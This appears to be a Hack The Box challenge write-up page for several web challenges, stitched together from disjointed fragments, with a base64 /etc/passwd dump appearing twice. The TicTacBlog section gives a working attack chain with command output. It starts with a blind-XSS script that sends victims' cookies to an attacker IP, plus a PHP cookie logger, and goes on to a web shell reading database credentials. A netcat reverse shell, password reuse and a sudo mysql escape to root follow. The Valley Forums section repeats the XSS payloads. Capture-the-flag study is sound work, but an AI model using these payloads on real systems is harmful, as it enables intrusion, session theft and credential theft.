<p><img src="data:image/svg+xml;base64 cm9vdDp4OjA6MDpyb290Oi9yb290Oi9iaW4vYmFzaApkYWVtb246eDoxOjE6ZGFlbW9uOi91c3Ivc2JpbjovdXNyL3NiaW4vbm9sb2dpbgpiaW46eDoyOjI6YmluOi9iaW46L3Vzci9zYmluL25vbG9naW4Kc3lzOng6MzozOnN5czovZGV2Oi91c3Ivc2Jpbi9ub2xvZ2luCnN5bmM6eDo0OjY1NTM0OnN5bmM6L2JpbjovYmluL3N5bmMKZ2FtZXM6eDo1OjYwOmdhbWVzOi91c3IvZ2FtZXM6L3Vzci9zYmluL25vbG9naW4KbWFuOng6NjoxMjptYW46L3Zhci9jYWNoZS9tYW46L3Vzci9zYmluL25vbG9naW4KbHA6eDo3Ojc6bHA6L3Zhci9zcG9vbC9scGQ6L3Vzci9zYmluL25vbG9naW4KbWFpbDp4Ojg6ODptYWlsOi92YXIvbWFpbDovdXNyL3NiaW4vbm9sb2dpbgpuZXdzOng6OTo5Om5ld3M6L3Zhci9zcG9vbC9uZXdzOi91c3Ivc2Jpbi9ub2xvZ2luCnV1Y3A6eDoxMDoxMDp1dWNwOi92YXIvc3Bvb2wvdXVjcDovdXNyL3NiaW4vbm9sb2dpbgpwcm94eTp4OjEzOjEzOnByb3h5Oi9iaW46L3Vzci9zYmluL25vbG9naW4Kd3d3LWRhdGE6eDozMzozMzp3d3ctZGF0YTovdmFyL3d3dzovdXNyL3NiaW4vbm9sb2dpbgpiYWNrdXA6eDozNDozNDpiYWNrdXA6L3Zhci9iYWNrdXBzOi91c3Ivc2Jpbi9ub2xvZ2luCmxpc3Q6eDozODozODpNYWlsaW5nIExpc3QgTWFuYWdlcjovdmFyL2xpc3Q6L3Vzci9zYmluL25vbG9naW4KaXJjOng6Mzk6Mzk6aXJjZDovdmFyL3J1bi9pcmNkOi91c3Ivc2Jpbi9ub2xvZ2luCmduYXRzOng6NDE6NDE6R25hdHMgQnVnLVJlcG9ydGluZyBTeXN0ZW0gKGFkbWluKTovdmFyL2xpYi9nbmF0czovdXNyL3NiaW4vbm9sb2dpbgpub2JvZHk6eDo2NTUzNDo2NTUzNDpub2JvZHk6L25vbmV4aXN0ZW50Oi91c3Ivc2Jpbi9ub2xvZ2luCl9hcHQ6eDoxMDA6NjU1MzQ6Oi9ub25leGlzdGVudDovdXNyL3NiaW4vbm9sb2dpbgpub2RlOng6MTAwMDoxMDAwOjovaG9tZS9ub2RlOi9iaW4vYmFzaAo=" alt="Read File"></p>
<p><img src="http://127.0.0.1:8000/api/dev?x-api-key=934caf98..." alt="Debug Endpoint"></p>
</body></html>sh
echo 'cm9vdDp4OjA6MDpyb290Oi9yb290Oi9iaW4vYmFzaApkYWVtb246eDoxOjE6ZGFlbW9uOi91c3Ivc2JpbjovdXNyL3NiaW4vbm9sb2dpbgpiaW46eDoyOjI6YmluOi9iaW46L3Vzci9zYmluL25vbG9naW4Kc3lzOng6MzozOnN5czovZGV2Oi91c3Ivc2Jpbi9ub2xvZ2luCnN5bmM6eDo0OjY1NTM0OnN5bmM6L2JpbjovYmluL3N5bmMKZ2FtZXM6eDo1OjYwOmdhbWVzOi91c3IvZ2FtZXM6L3Vzci9zYmluL25vbG9naW4KbWFuOng6NjoxMjptYW46L3Zhci9jYWNoZS9tYW46L3Vzci9zYmluL25vbG9naW4KbHA6eDo3Ojc6bHA6L3Zhci9zcG9vbC9scGQ6L3Vzci9zYmluL25vbG9naW4KbWFpbDp4Ojg6ODptYWlsOi92YXIvbWFpbDovdXNyL3NiaW4vbm9sb2dpbgpuZXdzOng6OTo5Om5ld3M6L3Zhci9zcG9vbC9uZXdzOi91c3Ivc2Jpbi9ub2xvZ2luCnV1Y3A6eDoxMDoxMDp1dWNwOi92YXIvc3Bvb2wvdXVjcDovdXNyL3NiaW4vbm9sb2dpbgpwcm94eTp4OjEzOjEzOnByb3h5Oi9iaW46L3Vzci9zYmluL25vbG9naW4Kd3d3LWRhdGE6eDozMzozMzp3d3ctZGF0YTovdmFyL3d3dzovdXNyL3NiaW4vbm9sb2dpbgpiYWNrdXA6eDozNDozNDpiYWNrdXA6L3Zhci9iYWNrdXBzOi91c3Ivc2Jpbi9ub2xvZ2luCmxpc3Q6eDozODozODpNYWlsaW5nIExpc3QgTWFuYWdlcjovdmFyL2xpc3Q6L3Vzci9zYmluL25vbG9naW4KaXJjOng6Mzk6Mzk6aXJjZDovdmFyL3J1bi9pcmNkOi91c3Ivc2Jpbi9ub2xvZ2luCmduYXRzOng6NDE6NDE6R25hdHMgQnVnLVJlcG9ydGluZyBTeXN0ZW0gKGFkbWluKTovdmFyL2xpYi9nbmF0czovdXNyL3NiaW4vbm9sb2dpbgpub2JvZHk6eDo2NTUzNDo2NTUzNDpub2JvZHk6L25vbmV4aXN0ZW50Oi91c3Ivc2Jpbi9ub2xvZ2luCl9hcHQ6eDoxMDA6NjU1MzQ6Oi9ub25leGlzdGVudDovdXNyL3NiaW4vbm9sb2dpbgpub2RlOng6MTAwMDoxMDAwOjovaG9tZS9ub2RlOi9iaW4vYmFzaAo=' | base64 -d
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin
node:x:1000:1000::/home/node:/bin/bash
Self
After multiple conversations, our dev team came up with a status monitoring system which does health checks for crucial components in our infrastructure. It has passed our QA but we doubt that it is secure. Can you help ?
- add to
/etc/hosts
sh
10.129.199.27 cloud.htb s3.cloud.htbsh
aws s3 ls s3://assets/ --endpoint-url http://s3.cloud.htb --recursive 130 ↵
2025-09-12 12:06:02 46 flag.txtsh
aws s3 cp s3://assets/flag.txt ./ --endpoint-url http://s3.cloud.htb
download: s3://assets/flag.txt to ./flag.txtsh
cat flag.txt
HTB{m3t4_4cc3ss_1s_tr1cky_s0m3t1m3s_df23g!!!}TicTacBlog
blind xss
script.js
js
new Image().src='http://10.10.14.44/index.php?c='+document.cookieindex.php
php
<?php
if (isset($_GET['c'])) {
$list = explode(";", $_GET['c']);
foreach ($list as $key => $value) {
$cookie = urldecode($value);
$file = fopen("cookies.txt", "a+");
fputs($file, "Victim IP: {$_SERVER['REMOTE_ADDR']} | Cookie: {$cookie}\n");
fclose($file);
}
}
?>- start listener
sh
sudo php -S 0.0.0.0:80try
txt
"><script src=http://10.10.14.33/script.js></script>or
txt
<script src=http://10.10.14.33/script.js></script>
sh
sudo php -S 0.0.0.0:80
[Thu Sep 11 21:47:21 2025] PHP 8.2.28 Development Server (http://0.0.0.0:80) started
[Thu Sep 11 21:48:41 2025] 10.129.199.167:55564 Accepted
[Thu Sep 11 21:48:41 2025] 10.129.199.167:55564 [200]: GET /script.js
[Thu Sep 11 21:48:41 2025] 10.129.199.167:55564 Closing
[Thu Sep 11 21:48:41 2025] 10.129.199.167:55566 Accepted
[Thu Sep 11 21:48:41 2025] 10.129.199.167:55566 [200]: GET /index.php?c=PHPSESSID=gc75e87d7i5t0vavg791l4mhap
[Thu Sep 11 21:48:41 2025] 10.129.199.167:55566 Closing
[Thu Sep 11 21:49:17 2025] 10.129.199.167:55636 Accepted
[Thu Sep 11 21:49:17 2025] 10.129.199.167:55636 [200]: GET /script.js
[Thu Sep 11 21:49:17 2025] 10.129.199.167:55636 Closing
[Thu Sep 11 21:49:17 2025] 10.129.199.167:55638 Accepted
[Thu Sep 11 21:49:17 2025] 10.129.199.167:55638 [200]: GET /index.php?c=PHPSESSID=gc75e87d7i5t0vavg791l4mhap
[Thu Sep 11 21:49:17 2025] 10.129.199.167:55638 Closing
sh
GET /imgupload/shell.php?cmd=cat+/var/www/html/config.php HTTP/1.1
Host: 10.129.199.167
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:140.0) Gecko/20100101 Firefox/140.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Connection: close
Cookie: PHPSESSID=gc75e87d7i5t0vavg791l4mhap
Upgrade-Insecure-Requests: 1
Priority: u=0, i
sh
<?php
define('DB_SERVER', 'localhost');
define('DB_USERNAME', 'blog');
define('DB_PASSWORD', 'applepies4breakfast');
define('DB_NAME', 'blog');
$conn = mysqli_connect(DB_SERVER, DB_USERNAME, DB_PASSWORD, DB_NAME);
if($conn === false){
die("ERROR: Could not connect. " . mysqli_connect_error());
}
?>
rev shell
sh
GET /imgupload/shell.php?cmd=busybox+nc+10.10.14.44+1234+-e+sh HTTP/1.1
Host: 10.129.199.167
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:140.0) Gecko/20100101 Firefox/140.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Connection: close
Cookie: PHPSESSID=gc75e87d7i5t0vavg791l4mhap
Upgrade-Insecure-Requests: 1
Priority: u=0, ish
rlwrap nc -lvnp 1234 1 ↵
listening on [any] 1234 ...
connect to [10.10.14.44] from (UNKNOWN) [10.129.199.167] 37472
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)sh
python3 -c 'import pty; pty.spawn("/bin/bash")'sh
www-data@tictacblog:/var/www/html$ netstat -tunlp
netstat -tunlp
(Not all processes could be identified, non-owned process info
will not be shown, you would have to be root to see it all.)
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name
tcp 0 0 127.0.0.1:46953 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.1:3306 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.1:32789 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN -
tcp6 0 0 :::80 :::* LISTEN -
tcp6 0 0 :::22 :::* LISTEN -
udp 0 0 0.0.0.0:68 0.0.0.0:* - sh
mysql -u blog -papplepies4breakfast -h 127.0.0.1sh
MariaDB [(none)]> sshow databases;
show databases;
+--------------------+
| Database |
+--------------------+
| blog |
| information_schema |
+--------------------+
2 rows in set (0.001 sec)sh
MariaDB [(none)]> use blog;
use blog;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A
Database changed
MariaDB [blog]> show tables;
show tables;
+----------------+
| Tables_in_blog |
+----------------+
| users |
+----------------+
1 row in set (0.000 sec)
MariaDB [blog]> select * from users;
select * from users;
+----+----------------------+--------------------------------------------------------------+---------------------+
| id | username | password | created_at |
+----+----------------------+--------------------------------------------------------------+---------------------+
| 3 | admin@tictacblog.htb | $2y$10$FJIn7nSLFYQ67QOmo/8hYuvi6jUDP0MToRNpHUptOGE9smbDYkUym | 2021-08-12 07:33:57 |
+----+----------------------+--------------------------------------------------------------+---------------------+
1 row in set (0.001 sec)sh
╔══════════╣ Active Ports
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#open-ports
tcp 0 0 127.0.0.1:46953 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.1:3306 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.1:32789 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN -
tcp6 0 0 :::80 :::* LISTEN -
tcp6 0 0 :::22 sh
╔══════════╣ Useful software
/usr/bin/base64
/usr/bin/g++
/usr/bin/gcc
/usr/bin/make
/usr/bin/nc
/usr/bin/nc.traditional
/usr/bin/netcat
/usr/bin/perl
/usr/bin/php
/usr/bin/ping
/usr/bin/python
/usr/bin/python2
/usr/bin/python2.7
/usr/bin/python3
/usr/bin/python3.7
/usr/bin/socat
/usr/bin/sudo
/usr/bin/wget
╔══════════╣ Installed Compilers
ii g++ 4:8.3.0-1 amd64 GNU C++ compiler
ii g++-8 8.3.0-6 amd64 GNU C++ compiler
ii gcc 4:8.3.0-1 amd64 GNU C compiler
ii gcc-8 8.3.0-6 amd64 GNU C compiler
/usr/bin/gcc
╔══════════╣ MySQL version
mysql Ver 15.1 Distrib 10.3.29-MariaDB, for debian-linux-gnu (x86_64) using readline 5.2
password reuse
sh
www-data@tictacblog:/home$ su anthony
su anthony
Password: applepies4breakfastuser.txt
sh
anthony@tictacblog:~$ cat user.txt
cat user.txt
HTB{P0lly_w4nTs_s0m3_co0k13s}priv esc
sh
anthony@tictacblog:~$ sudo -l
sudo -l
[sudo] password for anthony: applepies4breakfast
Matching Defaults entries for anthony on tictacblog:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User anthony may run the following commands on tictacblog:
(ALL : ALL) /usr/bin/mysql
sh
anthony@tictacblog:~$ sudo mysql -e '\! /bin/sh'
sudo mysql -e '\! /bin/sh'
[sudo] password for anthony: applepies4breakfast
sh
# whoami
whoami
root
# cd /root
cd /root
# ls
ls
root.txt
# cat root.txt
cat root.txt
HTB{5UD0_p3rMisSi0ns_R_d4ng3r0us}
Cursed Scrolls
Please check the note.md file first for more information. The Citadel Defense System stands as the last line of protection, but whispers of an ancient curse loom over its core. Mysterious scrolls hold secrets that could unravel its defenses, while unseen forces seek to exploit its weaknesses. As a lone investigator, you must navigate cryptic mechanisms, uncover hidden flaws, and restore the Citadel’s integrity before the curse takes hold. Will you break the spell or fall victim to the unseen dangers within?
Space Uber
Please check the note.md file first for more information. Morty’s interdimensional ride-sharing startup seemed like a brilliant idea—until passengers started traveling for free. A hidden flaw in the system allows unauthorized access, letting sneaky users manipulate ride bookings and bypass payments. With profits plummeting and Rick unimpressed, Morty needs your help to fix the vulnerability. Can you analyze the system, secure the API, and ensure only legitimate rides are processed? The future of Space Uber—and Morty’s entrepreneurial dreams—rests in your hands!
PageOneHTML
Our employees needed a Markdown to HTML converter that will also directly embed all media in the HTML for offline portability. Since this is a public-facing application, we want you to take a look at it and make sure it is secure.
sh
sh
cho 'cm9vdDp4OjA6MDpyb290Oi9yb290Oi9iaW4vYmFzaApkYWVtb246eDoxOjE6ZGFlbW9uOi91c3Ivc2JpbjovdXNyL3NiaW4vbm9sb2dpbgpiaW46eDoyOjI6YmluOi9iaW46L3Vzci9zYmluL25vbG9naW4Kc3lzOng6MzozOnN5czovZGV2Oi91c3Ivc2Jpbi9ub2xvZ2luCnN5bmM6eDo0OjY1NTM0OnN5bmM6L2JpbjovYmluL3N5bmMKZ2FtZXM6eDo1OjYwOmdhbWVzOi91c3IvZ2FtZXM6L3Vzci9zYmluL25vbG9naW4KbWFuOng6NjoxMjptYW46L3Zhci9jYWNoZS9tYW46L3Vzci9zYmluL25vbG9naW4KbHA6eDo3Ojc6bHA6L3Zhci9zcG9vbC9scGQ6L3Vzci9zYmluL25vbG9naW4KbWFpbDp4Ojg6ODptYWlsOi92YXIvbWFpbDovdXNyL3NiaW4vbm9sb2dpbgpuZXdzOng6OTo5Om5ld3M6L3Zhci9zcG9vbC9uZXdzOi91c3Ivc2Jpbi9ub2xvZ2luCnV1Y3A6eDoxMDoxMDp1dWNwOi92YXIvc3Bvb2wvdXVjcDovdXNyL3NiaW4vbm9sb2dpbgpwcm94eTp4OjEzOjEzOnByb3h5Oi9iaW46L3Vzci9zYmluL25vbG9naW4Kd3d3LWRhdGE6eDozMzozMzp3d3ctZGF0YTovdmFyL3d3dzovdXNyL3NiaW4vbm9sb2dpbgpiYWNrdXA6eDozNDozNDpiYWNrdXA6L3Zhci9iYWNrdXBzOi91c3Ivc2Jpbi9ub2xvZ2luCmxpc3Q6eDozODozODpNYWlsaW5nIExpc3QgTWFuYWdlcjovdmFyL2xpc3Q6L3Vzci9zYmluL25vbG9naW4KaXJjOng6Mzk6Mzk6aXJjZDovdmFyL3J1bi9pcmNkOi91c3Ivc2Jpbi9ub2xvZ2luCmduYXRzOng6NDE6NDE6R25hdHMgQnVnLVJlcG9ydGluZyBTeXN0ZW0gKGFkbWluKTovdmFyL2xpYi9nbmF0czovdXNyL3NiaW4vbm9sb2dpbgpub2JvZHk6eDo2NTUzNDo2NTUzNDpub2JvZHk6L25vbmV4aXN0ZW50Oi91c3Ivc2Jpbi9ub2xvZ2luCl9hcHQ6eDoxMDA6NjU1MzQ6Oi9ub25leGlzdGVudDovdXNyL3NiaW4vbm9sb2dpbgpub2RlOng6MTAwMDoxMDAwOjovaG9tZS9ub2RlOi9iaW4vYmFzaAo=' | base64 -d
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin
node:x:1000:1000::/home/node:/bin/bash
HalCrypto
Meet HalCrypto, the decentralized cryptocurrency that provides you the liberty to exchange value without intermediaries and translates to greater control of funds with lower fees. Our developers have worked very hard to make the platform secure. We want you to take a look and see if you can log in as the admin.
Valley Forums
Hill Valley has filed a complaint that someone hijacked their forums website, can you take a look and identify the culprit?
sh
<script src=http://10.10.14.44/script.js></script>sh
%3Cscript%20src=http://10.10.14.44/script.js%3E%3C/script%3EIOI SaveData
To help Art3mis escape from the IOI loyalty center, Parzival and Aech need to hack into Sorrento's computer. They have discovered that IOI developed an exploit that lets them arbitrarily change the OASIS profile data of individual players. Sorrento has left the web interface for that profile editor exposed in his home network. Can you take a look and see if you can get inside?
Council of Ricks
Please check the note.md file first for more information. The Council of Ricks ID System was meant to bring order to the multiverse, but its outdated infrastructure has left it exposed. A flawed communication protocol and unchecked access threaten its integrity, allowing hidden threats to lurk within. With security gaps in its authentication and data processing, the system is on the brink of collapse. Can you analyze the vulnerabilities, patch the flaws, and reinforce its defenses before chaos spreads across realities? The fate of the Council rests in your hands!
sh
HTB{xX3_tHRe4t_n3veR_uSe_eNts!!_a8bb9b87d9ef599588ff5eb577856977}login.php
<?php
include 'db.php';
if ($_SERVER['REQUEST_METHOD'] === 'POST') {
$rawPostData = file_get_contents('php://input');
libxml_disable_entity_loader(true);
$xml = simplexml_load_string($rawPostData);
$username = (string) $xml->username ?? '';
$password = (string) $xml->password ?? '';
// Check the database for the user
$stmt = $pdo->prepare("SELECT * FROM users WHERE username = :username LIMIT 1");
$stmt->bindParam(':username', $username, PDO::PARAM_STR);
$stmt->execute();
$user = $stmt->fetch(PDO::FETCH_ASSOC);
// If user exists and password matches
if ($user && password_verify($password, $user['password'])) {
session_start();
$_SESSION['user_id'] = $user['id'];
$_SESSION['username'] = $user['username'];
header('Location: dashboard.php');
exit;
}
$error = "Invalid username or password.";
}
?>add-rick.php
<?php
include 'db.php';
if ($_SERVER['REQUEST_METHOD'] === 'POST') {
$rawPostData = file_get_contents('php://input');
libxml_disable_entity_loader(true);
$xml = simplexml_load_string($rawPostData);
if ($xml === false) {
die("Invalid XML data");
}
$rick_id = (string) $xml->rick_id ?? '';
$rating = (string) $xml->rating ?? '';
$description = (string) $xml->description ?? '';
$insertQuery = "INSERT INTO ricks (rick_id, rating, description) VALUES (:rick_id, :rating, :description)";
$stmt = $pdo->prepare($insertQuery);
$stmt->bindParam(':rick_id', $rick_id, PDO::PARAM_STR);
$stmt->bindParam(':rating', $rating, PDO::PARAM_STR);
$stmt->bindParam(':description', $description, PDO::PARAM_STR);
if (!$stmt->execute()) {
die("Failed to add Rick to database!");
}
}
?>Lost Doctorhood
Please check the note.md file first for more information. In a forgotten corner of the digital world, a system built to safeguard knowledge now stands exposed to hidden threats. A mysterious breach has left traces of intrusion—anomalies in the database, loopholes in security, and a silent attempt at deeper control. Can you uncover the vulnerabilities, restore order, and secure the system against future exploitation? Examine the logic, fortify its defenses, and ensure no hidden threats remain. The system’s fate is in your hands—will you heal its wounds or let the breach grow unchecked?
ScrapeWare
Our brand new SaaS product Scrapeware is almost ready for production. We currently have a beta instance of the product live. Could you review the application to find any major vulnerabilities that can lead to the compromise of the live instance?
Up next
MediumSep 2025
HTB — Expressway
Express.js prototype pollution vulnerability leads to remote code execution via deserialization of a crafted payload.
Read writeup
MediumOct 2025
HTB — Imagery
ImageMagick policy bypass enables SSRF and local file read to steal credentials. Sudo misconfiguration grants root access.
Read writeup
MediumOct 2025
HTB — DarkZero
Active Directory environment with Shadow Credentials and Resource-Based Constrained Delegation abuse to achieve full domain compromise.
Read writeup